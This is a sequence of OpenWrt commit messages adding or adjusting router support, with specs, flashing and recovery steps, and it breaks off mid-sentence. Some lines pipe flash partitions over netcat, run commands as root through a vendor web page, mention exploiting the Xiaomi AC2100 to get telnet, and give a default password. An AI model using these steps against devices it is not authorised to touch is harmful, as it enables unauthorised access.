When selecting a channel below 100 on the 5GHz radio, the channel will
be detected as busy all the time.
Survey data from wlan1
frequency: 5240 MHz [in use]
channel active time: 165729 ms
channel busy time: 158704 ms
channel transmit time: 0 ms
Channels 100 and above work fine:
Survey data from wlan1
frequency: 5500 MHz
channel active time: 133000 ms
channel busy time: 21090 ms
channel transmit time: 0 ms
Limit the available channels, so users do not have the impression
their device is broken.
Signed-off-by: David Bauer <mail@david-bauer.net>
This patch adds support for D-Link DIR-1960 A1. Given the similarity with
the DIR-1760/2660 A1, this patch also introduces a common DTSI which can
be shared with these devices, with support to be added in future commits.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:EB (label)
wan factory 0xe006 *:EE
2.4 factory 0xe000 +1 *:EC
5.0 factory 0xe000 +2 *:ED
Seems like vendor didn't replace the dummy entrys in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[fix whitespace issues, create patch to merge DIR-1960 first, move
special WiFi MAC settings to DTS, extend commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet
ports. Even if mine is branded as "Gemeita AC2100", the sticker on the
back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6.
Probably the real product name is the Wavlink WL-WN583A6 because of
the many references to Wavlink in the OEM firmware and bootlog.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 8MB NOR (GigaDevice GD25Q64B)
ETH: 2x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7603E (2x2:2)
- 5GHz: 1x MT7615E (4x4:4)
- 6 internal antennas
BTN:
- 1x Reset button
- 1x WPS button
- 1x ON/OFF switch (working but unmodifiable)
- 1x Auto/Schedule switch (working but unmodifiable. Read Note #3)
LEDS:
- 1x White led
- 1x Red led
- 1x Amber led
- 1x Blue led
- 2x Blue leds (lan and wan port status: working but unmodifiable)
UART:
- 57600-8-N-1
Everything works correctly.
Currently there is no firmware update available. Because of this, in
order to restore the OEM firmware, you must firstly dump the OEM
firmware from your router before you flash the OpenWrt image.
Backup the OEM Firmware
-----------------------
The following steps are to be intended for users having little to none
experience in linux. Obviously there are many ways to backup the OEM
firmware, but probably this is the easiest way for this router.
Procedure tested on M83A6.V5030.191210 firmware version.
1) Go to http://192.168.10.1/webcmd.shtml
2) Type the following line in the "Command" input box:
mkdir /etc_ro/lighttpd/www/dev; for i in /dev/mtd*ro; do dd if=${i} of=/etc_ro/lighttpd/www${i}; done
3) Click "Apply"
4) After few seconds, in the textarea should appear this output:
16384+0 records in
16384+0 records out
8388608 bytes (8.0MB) copied, 4.038820 seconds, 2.0MB/s
384+0 records in
384+0 records out
196608 bytes (192.0KB) copied, 0.095180 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.032020 seconds, 2.0MB/s
128+0 records in
128+0 records out
65536 bytes (64.0KB) copied, 0.031760 seconds, 2.0MB/s
15744+0 records in
15744+0 records out
8060928 bytes (7.7MB) copied, 3.885280 seconds, 2.0MB/s
dd: can't open '/dev/mtd5ro': No such device
dd: can't open '/dev/mtd6ro': No such device
dd: can't open '/dev/mtd7ro': No such device
Excluding the "X.XXXXXX seconds" part, you should get the same
exact output. If your output doesn't match mine, stop reading
and ask for help in the forum.
5) Open the following links to download the partitions of the OEM FW:
http://192.168.10.1/dev/mtd0rohttp://192.168.10.1/dev/mtd1rohttp://192.168.10.1/dev/mtd2rohttp://192.168.10.1/dev/mtd3rohttp://192.168.10.1/dev/mtd4ro
If one (or more) of these files weight 0 byte, stop reading and ask
for help in the forum.
6) Store these downloaded files in a safe place.
7) Reboot your router to remove any temporary file from your router.
Installation
------------
Flash the initramfs image in the OEM firmware interface.
When openwrt boots, flash the sysupgrade image otherwise you won't be
able to keep configuration between reboots.
Restore OEM Firmware
--------------------
Flash the "mtd4ro" file you previously backed-up directly from LUCI.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Notes
-----
1) The "System Command" page allows to run every command as root.
For example you can use "dd" and "nc" to backup the OEM firmware.
PC (SERVER):
nc -l 5555 > ./mtdXro
ROUTER (CLIENT):
dd if=/dev/mtdXro | nc PC_IP_ADDRESS 5555
2) The OEM web interface accepts only images containing the string
"WN583A6" in the filename.
Currently the OEM interface accepts only the initramfs image
probably because it checks if the ih_size in the image header is
equal to the whole image size (instead of the kernel size)
Read more here:
https://forum.openwrt.org/t/support-for-strong-1200/22768/19
3) The white led (namely "Smart Night Light") can be controller by the
user only if the side switch is set to "Schedule" otherwise it will
be activated by the light condition (there is a photodiode on the
top side of the router)
4) Router mac addresses:
LAN XX:XX:XX:XX:XX:8F
WAN XX:XX:XX:XX:XX:90
WIFI 2G XX:XX:XX:XX:XX:91
WIFI 5G XX:XX:XX:XX:XX:92
LABEL XX:XX:XX:XX:XX:91
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[remove chosen node, fix whitespace]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This reverts commit 1623defbdbb852a4018329d07673b4b8f66225a8.
As already stated in the reverted patch, the OEM firmware will
properly recreate the config partition if it is overwritten by
OpenWrt.
The main reason for adding the partition was the image size
restriction imposed by the 0x3d0000 limitation of the TFTP
flashing process. Addressing this by shrinking the firmware
partition is not a good solution to that problem, though:
1. For a working image, the size of the content has to be smaller
than the available space, so empty erase blocks will remain.
2. Conceptually, the restriction is on the image, so it makes sense
to implement it in the same way, and not via the partitioning.
Users could e.g. do initial flash with TFTP restriction with
an older image, and then sysupgrade into a newer one, so TFTP
restriction does not apply.
3. The (content) size of the recovery image is enforced to 0x3d0000
by the tplink-v2-image command in combination with
TPLINK_FLASHLAYOUT (flash layout in mktplinkfw2.c) anyway.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Increase the SPI frequency for the MT7620 based TP-Link Archer
series to 30MHz.
TP-Link uses different SPI flash chips for the same board
revision, so be conservative to not break boards with a
different chip. 30MHz should be well supported by all chips.
Tested on Archer C2 v1 (GD25Q64B) and Archer C20i (W25Q64FV).
Archer C20i (before)
====================
root@OpenWrt:~# time dd if=/dev/mtd1 of=/tmp/test.bin bs=64k
122+0 records in
122+0 records out
real 0m 15.30s
user 0m 0.00s
sys 0m 15.29s
Archer C20i (after)
===================
root@OpenWrt:~# time dd if=/dev/mtd1 of=/tmp/test.bin bs=64k
122+0 records in
122+0 records out
real 0m 5.99s
user 0m 0.00s
sys 0m 5.98s
Signed-off-by: David Bauer <mail@david-bauer.net>
Acked-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds a trigger for the WAN LED and enhances support for
the WiFi LED by enabling activity indication.
This is based on bug report feedback (see reference below).
While at it, update the LED node names in DTS file.
Fixes: FS#732
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The config partition was missing from the flash layout of the device.
Although the stock firmware resets a corrupted config partition to the
default values, the TFTP flash with an image bigger than 0x3d0000 will
truncate the image as the bootloader only copies 0x3d0000 bytes to flash
during TFTP flashing.
Fixed by adding the config partition and shrinking the firmware
partition.
Fixes: 3fd97c522bb7 ("ramips: add support for TP-Link TL-WR841n v14")
Signed-off-by: Alexander Müller <donothingloop@gmail.com>
The factory partition on this device is only 64k in size, so having
mediatek,mtd-eeprom = <&factory 0x10000> would place the EEPROM data
after the end of the flash. As can be verified against the TP-Link
GPL sources, which contain the EEPROM data as binary blob, the actual
address for the EEPROM data is 0x0.
Since 0x0 is default for MT7628, the incorrect line is just removed.
This error is the reason for the abysmal Wifi performance that people
are complaining about for the WR841Nv14.
Fixes: 3fd97c522bb7 ("ramips: add support for TP-Link TL-WR841n v14")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
For mt7621, console is set up via DTS bootargs individually in
device DTS/DTSI files. However, 44 of 74 statements use the
following setting:
chosen {
bootargs = "console=ttyS0,57600";
};
Therefore, don't repeat ourselves and move that definition to the SoC
DTSI file to serve as a default value.
This patch is cosmetic.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-867 A1 and D-Link DIR-882 A1. Given
the similarity of these devices, this patch also introduces a common DTS
shared between DIR-867 A1, DIR-878 A1 and DIR-882 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 128 MB (DDR3)
* Flash: 16 MB (SPI NOR)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WiFi Toggle, WPS
* LEDs: Power (green/orange), Internet (green/orange), WiFi 2.4G (green),
WiFi 5G (green), USB 2.0 (green), USB 3.0 (green)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
* DIR-867 wireless chips are limited to 3x3 streams at hardware level
* USB ports and related LEDs available only on DIR-882
Serial port:
* Parameters: 57600, 8N1
* Location: J1 header (close to the Reset, WiFi and WPS buttons)
* Pinout: 1 - VCC
2 - RXD
3 - TXD
4 - GND
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
Signed-off-by: Mateus B. Cassiano <mbc07@live.com>
[move DEVICE_VARIANT to individual definitions]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Add a common definition for ELECOM WRC "GS" devices to mt7621.mk
to not repeat the same assignments five times.
To keep the naming consistent, slightly rename the DTSI and the
factory image recipe as well.
Note that elecom_wrc-1167ghbk2-s uses a slightly different build
recipe for the factory image, so we keep it separate.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Tested-by: INAGAKI Hiroshi <musashino.open@gmail.com> [WRC-1750GSV]
Specifications:
SoC: MT7621AT
RAM: 128MB
Flash: 16MB NOR SPI flash
WiFi: MT7615N (2.4GHz) and MT7615N (5Ghz)
LAN: 5x1000M
Firmware layout is Uboot with extra 96 bytes in header
Base PCB is AP-MTKH7-0002
LEDs Power Green,Power Orange,Internet Green,Internet Orange
LEDs "2.4G" Green & "5G" Green connected directly to wifi module
Buttons Reset,WPS,WIFI
Flashing instructions:
Upload image via emergency recovery mode
Push and hold reset button (on the back of the device) until power led
starts flashing (about 10 secs or so) while powering the device on.
Give it ~30 seconds, to boot the recovery mode GUI
Connect your client computer to LAN1 of the device
Set your client IP address manually to 192.168.0.2 / 255.255.255.0.
Call the recovery page for the device at http://192.168.0.1
Use the provided emergency web GUI to upload and flash a new firmware to
the device. Some browsers/OS combinations are known not to work, so if
you don't see the percentage complete displayed and moving within a few
seconds, restart the procedure from scratch and try anoher one,
or try the command line way.
Alternative method using command line on Linux:
curl -v -i -F "firmware=@openwrt-xxxx-squashfs-factory.bin" 192.168.0.1
Signed-off-by: Mathieu Martin-Borret <mathieu.mb@protonmail.com>
[use of generic uimage-padhdr in image generation code]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
This creates a common DTSI and shared image definition for the
relatively similar Netgear devices for mt7628 platform.
As a side effect, this raises SPI flash frequency for the R6120,
as it's expected to work there as well if it works for R6080 and
R6020.
Based on the data from the other devices, it also seems probable
the 5g MAC address for R6120 could be extracted from the caldata,
and the mtd-mac-address there could be dropped.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This adds support for the Netgear R6020, aka Netgear AC750.
The R6020 appears to be the same hardware as the Netgear R6080,
aka Netgear AC1000, but it has a slightly different flash layout,
and no USB ports.
Specification:
SoC: MediaTek MT7628 (580 MHz)
Flash: 8 MiB
RAM: 64 MiB
Wireless: 2.4Ghz (builtin) and 5Ghz (MT7612E)
LAN speed: 10/100
LAN ports: 4
WAN speed: 10/100
WAN ports: 1
UART (57600 8N1) on PCB
MAC addresses based on vendor firmware:
LAN *:88 0x4
WAN *:89
WLAN2 *:88 0x4
WLAN5 *:8a 0x8004
The factory partition might have been corrupted beforehand. However,
the comparison of vendor firmware and OpenWrt still allowed to retrieve
a meaningful assignment that also matches the other similar devices.
Installation:
Flashing OpenWRT from stock firmware requires nmrpflash. Use an ethernet
cable to connect to LAN port 1 of the R6020, and power the R6020 off.
From the connected workstation, run
`nmrpflash -i eth0 -f openwrt-ramips-mt76x8-netgear_r6020-squashfs-factory.img`,
replacing eth0 with the appropriate interface (can be identified by
running `nmrpflash -L`). Then power on the R6020. After flashing has finished,
power cycle the R6020, and it will boot into OpenWRT. Once OpenWRT has been
installed, subsequent flashes can use the web interface and sysupgrade files.
Signed-off-by: Tim Thorpe <timfthorpe@gmail.com>
[slightly extend commit message, fix whitespaces in DTS, align From:
with Signed-off-by]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Device specification:
SoC: RT5350
CPU Frequency: 360 MHz
Flash Chip: Macronix MX25L6406E (8192 KiB)
RAM: Winbond W9825G6JH-6 (32768 KiB)
5x 10/100 Mbps Ethernet (4x LAN, 1x WAN)
1x external antenna
UART (J1) header on PCB (57800 8n1)
Wireless: SoC-intergated: 2.4GHz 802.11bgn
USB: None
8x LED, 2x button
Flash instruction:
Configure PC with static IP 192.168.99.8/24 and start TFTP server.
Rename "openwrt-ramips-rt305x-zyxel_keenetic-lite-b-squashfs-sysupgrade.bin"
to "rt305x_firmware.bin" and place it in TFTP server directory.
Connect PC with one of LAN ports, press the reset button, power up
the router and keep button pressed until power LED start blinking.
Router will download file from TFTP server, write it to flash and reboot.
Signed-off-by: Sergei Burakov <senior.anonymous@ya.ru>
Hardware
--------
SoC: MediaTek MT7621ST
WiFi: MediaTek MT7603
Quantenna QT3840BC
Flash: 128M NAND
RAM: 64M
LED: Dual colour red and green
BTN: Reset
WPS
Eth: 4 x 10/100/1000 connected to MT7621 internal switch
MT7621 RGMII port connected to Quantenna module
GPIO: Power/reset of Quantenna module
Quantenna module
----------------
The Quantenna QT3840BC (or QV840) is a separate SoC running
another Linux installation. It is mounted on a wide mini-PCIe
form factor module, but is connected to the RGMII port of
the MT7621. It loads both a second uboot stage and an os
image from the MT7621 using tftp. The module is configured
using Quantenna specific RPC calls over IP, using 802.1q
over the RGMII link to support multiple SSIDs.
There is no support for using this module as a WiFi device
in OpenWrt. A package with basic firmware and management
tools is being prepared.
Serial ports
------------
Two serial ports with headers:
RRJ1 - 115200 8N1 - Connected to the Quantenna console
J1 - 57600 8N1 - Connected to the MT7621 console
Both share pinout with many other Zyxel/Mitrastar devices:
1 - NC (VDD)
2 - TX
3 - RX
4 - NC (no pin)
5 - GND
Dual system partitions
----------------------
The vendor firmware and boot loader use a dual partition
scheme storing a counter in the header of each partition. The
partition with the highest number will be selected for boot.
OpenWrt does not support this scheme and will always use the
first OS partition. It will reset both counters to zero the
first time sysupgrade is run, making sure the first partition
is selected by the boot loader.
Installation from vendor firmware
---------------------------------
1. Run a DHCP server. The WAP6805 is configured as a client device
and does not have a default static IP address. Make a note of
which address it is assigned
2. tftp the OpenWrt initramfs-kernel.bin image to this address.
Wait for the WAP6805 to reboot.
3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a
backup of all mtd partitions now. The last used OEM image is
still present in either "Kernel" or "Kernel2" at this point,
and can be restored later if you save a copy.
4. sysupgrade to the OpenWrt sysupgrade.bin image.
Installation from U-Boot
------------------------
This requires serial console access
1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to
your tftp server directory. Configure the server address as
192.168.0.33/24
2. Hit ESC when the message "Hit ESC key to stop autoboot"
appears
3. Type "ATGU" + Enter, and then "2" immediately after pressing enter.
4. Answer Y to the question "Erase Linux in Flash then burn new
one. Are you sure?", and answer the address/filename questions.
Defaults:
Input device IP (192.168.0.2)
Input server IP (192.168.0.33)
Input Linux Kernel filename ("ras.bin")
5. Wait until after you see the message "Done!" and power cycle
the device. It will hang after flashing.
6. Continue with step 3 and 4 from the vendor firmware procedure.
Notes on the WAP6805 U-Boot
---------------------------
The bootloader has been modified with both ZyXELs zyloader and the
device specific dual partition scheme. These changes appear to have
broken a few things. The zyloader shell claims to support a number
of ZyXEL AT commands, but not all of them work. The image selection
scheme is unreliable and inconsistent. A limited U-Boot menu is
available - and used by the above U-Boot install procedure. But
direct booting into an uploaded image does not work, neither with
ram nor with flash. Flashing works, but requires a hard reset after
it is finished.
Reverting to OEM firmware
-------------------------
The OEM firmware can be restored by using mtd write from OpenWrt,
flashing it to the "Kernel" partition. E.g.
ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin
OEM firmwares for the WAP6805 are not avaible for public download,
so a backup of the original installation is required. See above.
Alternatively, firmware for the WAP6806 (Armor X1) may be used. This
is exactly the same hardware. But the branding features do obviously
differ.
LED controller
--------------
Hardware implementation is unknown. The dual-color LED is controlled
by 3 GPIOs:
4: red
7: blinking green
13: green
Enabling both red and green makes the LED appear yellow.
The boot loader enables hardware blinking, causing the green LED to blink
slowly on power-on, until the OpenWrt boot mode starts a faster software
blink.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
[fix alphabetic sorting for image build statement]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 16MB NOR (Macronix MX25L12805D)
ETH: 1x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615 (4x4:4)
- 5GHz: 1x MT7615 (4x4:4)
- 4 antennas: 2 external detachable and 2 internal
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x Green led (Power)
- 1x Green-Amber-Red led (Wifi)
UART:
- 57600-8-N-1
Everything works correctly.
Installation
------------
Flash the factory image directly from OEM web interface.
(You can login using these credentials: admin/1234)
Restore OEM Firmware
--------------------
Flash the OEM "bin" firmware directly from LUCI.
The firmware is downloadable from the OEM web page.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Restoring procedure tested with RE23_1.08.bin
MAC addresses
-------------
factory 0x4 *:24
factory 0x8004 *:25
Cimage 0x07 *:24
Cimage 0x0D *:24
Cimage 0x13 *:24
Cimage 0x19 *:25
No other addresses were found in factory partition.
Since the label contains both the 2.4GHz and 5GHz mac address I decided
to set the 5GHz one as label-mac-device. Moreover it also corresponds
to the lan mac address.
Notes
-----
The wifi led in the OEM firmware changes colour depending on the signal
strength. This can be done in OpenWrt but just for one interface.
So for now will not be any default action for this led.
If you want to open the case, pay attention to the antenna placed on
the bottom part of the front cover.
The wire is a bit short and it breaks easily. (I broke it)
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[fix two typos and add extended MAC address section to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This moves WiFi LED triggers from 01_leds to device tree.
While at it, convert the labels there to lower case; this is
more commonly used and the change will actually remove competition
between DT trigger and leftover uci config on already installed
systems.
Suggested-by: Georgi Vlaev <georgi.vlaev@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device uses the same hardware as RE650 v1 which got supported in
8c51dde.
Hardware specification:
- SoC 880 MHz - MediaTek MT7621AT
- 128 MB of DDR3 RAM
- 16 MB - Winbond 25Q128FVSG
- 4T4R 2.4 GHz - MediaTek MT7615E
- 4T4R 5 GHz - MediaTek MT7615E
- 1x 1 Gbps Ethernet - MT7621AT integrated
- 7x LEDs (Power, 2G, 5G, WPS(x2), Lan(x2))
- 4x buttons (Reset, Power, WPS, LED)
- UART header (J1) - 2:GND, 3:RX, 4:TX
Serial console @ 57600,8n1
Flash instructions:
Upload
openwrt-ramips-mt7621-tplink_re500-v1-squashfs-factory.bin
from the RE500 web interface.
TFTP recovery to stock firmware:
Unfortunately, I can't find an easy way to recover the RE
without opening the device and using modified binaries. The
TFTP upload will only work if selected from u-boot, which
means you have to open the device and attach to the serial
console. The TFTP update procedure does *not* accept the
published vendor firmware binaries. However, it allows to
flash kernel + rootfs binaries, and this works if you have
a backup of the original contents of the flash. It's probably
possible to create special image out of the vendor binaries
and use that as recovery image.
Signed-off-by: Christoph Krapp <achterin@googlemail.com>
[remove dts-v1 in DTSI, do not touch WiFi LEDs for RE650, keep
state_default in DTS files, fix label-mac-device, use lower case
for WiFi LEDs]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Reduce spi-max-frequency for ipTIME A8004T and disable
m25p,fast-read option.
A8004T uses `en25qh128` for the MTD.
This flash memory would allow 80MHz, sometimes kernel received
wrong id value in initramfs installed router.
(kernel expected `1c 70 18 1c 70 18`, but one of cases, it
was `9c 70 18 1c 70 18`)
In this case, openwrt can't detect the partition information,
it would write the inccorect data to the firmware partition and
also it would occur the bootlooping after sysupgrade.
Signed-off-by: Sunguk Lee <d3m3vilurr@gmail.com>
[minor commit title/message adjustments]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
TP-Link RE220 v2 is a wireless range extender with Ethernet and 2.4G and 5G
WiFi with internal antennas. It's based on MediaTek MT7628AN+MT7610EN.
This port of OpenWRT leverages work done by Andreas Böhler <dev@aboehler.at>
for the TP-Link RE200 v2 as both devices share the same SoC, flash layout
and GPIO pinout.
Specifications
MediaTek MT7628AN (580 Mhz)
64 MB of RAM
8 MB of FLASH
2T2R 2.4 GHz and 1T1R 5 GHz
1x 10/100 Mbps Ethernet
UART header on PCB (57600 8n1)
8x LED (GPIO-controlled), 2x button
There are 2.4G and 5G LEDs in red and green which are controlled separately.
Web Interface Installation
It is possible to upgrade to OpenWrt via the web interface. Simply flash
the -factory.bin from OEM. In contrast to a stock firmware, this will not
overwrite U-Boot.
Signed-off-by: Rowan Border <rowanjborder@gmail.com>
The RAVPower RP-WD009 is a batter-powered pocket sized router with SD
card lot and USB port.
Hardware
--------
CPU: MediaTek MT7628AN
RAM: 64M DDR2
FLASH: 16M GigaDevices SPI-NOR
WLAN: MediaTek MT7628AN 2T2R b/g/n
MediaTek MT7610E 1T1R n/ac
ETH: 1x FastEthernet
SD: SD Card slot
USB: USB 2.0
Custom PMIC on the I2C bus (address 0x0a).
Installation
------------
1. Press and hold down the reset button.
2. Power up the Device. Keep pressing the reset button for 10
more seconds until the Globe LED lights up.
3. Attach your Computer to the Ethernet port. Assign yourself the
address 10.10.10.1/24.
4. Access the recovery page at 10.10.10.128 and upload the OpenWrt
factory image.
5. The flashing will take around 1 minute. The device will reboot
automatically into OpenWrt.
Signed-off-by: David Bauer <mail@david-bauer.net>
This commit adds support for the Wavlink WL-WN577A2 (black case) dual-band
wall-plug wireless router. In Germany this device is sold under the brand
name Maginon WL-755 (white case):
Device specifications:
- CPU: MediaTek MT7628AN (580MHz)
- Flash: 8MB
- RAM: 64MB
- Bootloader: U-Boot
- Ethernet: 2x 10/100 Mbps (Ralink RT3050)
- 2.4 GHz: 802.11b/g/n SoC
- 5 GHz: 802.11a/n/ac MT7610E
- Antennas: internal
- 4 green LEDs: 1 programmable (WPS) + LAN, WAN, POWER
- Buttons: Reset, WPS
- Small sliding power switch
Flashing instructions (U-boot):
- Configure a TFTP server on your PC/Laptop and set its IP
to 192.168.10.100
- Rename the OpenWrt image to firmware.bin and place it in the
root folder of the TFTP server
- Power off (using the small sliding power switch on the left
side) the device and connect an ethernet cable from its LAN
or WAN port to your PC/Laptop
- Press the WPS button (and keep it pressed)
- Power on the device (using the small power switch)
- After a few seconds, when the WAN/LAN LED stops blinking
very fast, release the WPS button
- Flashing OpenWrt takes less than a minute, system will
reboot automatically
- After reboot the WPS LED will indicate the current OpenWrt
running status
Signed-off-by: Lars Wessels <software@bytebox.org>
[removed unused labels - fix whitespace errors - wrap commit message]
Signed-off-by: David Bauer <mail@david-bauer.net>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
This adds support for the Netgear R6080, aka Netgear AC1000.
The R6080 has almost the same hardware as the Netgear R6120,
aka Netgear AC1200, but it lacks the USB port, has only 8 MiB flash and
uses a different SERCOMM_HWID.
Specification:
SoC: MediaTek MT7628 (580 MHz)
Flash: 8 MiB
RAM: 64 MiB
Wireless: 2.4Ghz (builtin) and 5Ghz (MT7612E)
LAN speed: 10/100
LAN ports: 4
WAN speed: 10/100
WAN ports: 1
UART (57600 8N1) on PCB
Installation:
Flashing OpenWRT from stock firmware requires nmrpflash. Use an ethernet
cable to connect to LAN port 1 of the R6080, and power the R6080 off.
From the connected workstation, run
`nmrpflash -i eth0 -f openwrt-ramips-mt76x8-netgear_r6080-squashfs-factory.img`,
replacing eth0 with the appropriate interface (can be identified by
running `nmrpflash -L`). Then power on the R6080. After flashing has finished,
power cycle the R6080, and it will boot into OpenWRT. Once OpenWRT has been
installed, subsequent flashes can use the web interface and sysupgrade files.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
[rebase and adjust for 5.4]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
chosen/bootargs are defined to the same value in device DTS files
that is already set in the SoC DTSI. Remove the redundant definitions.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This moves the trigger for the Netgear R6120's wlan2g_green LED from
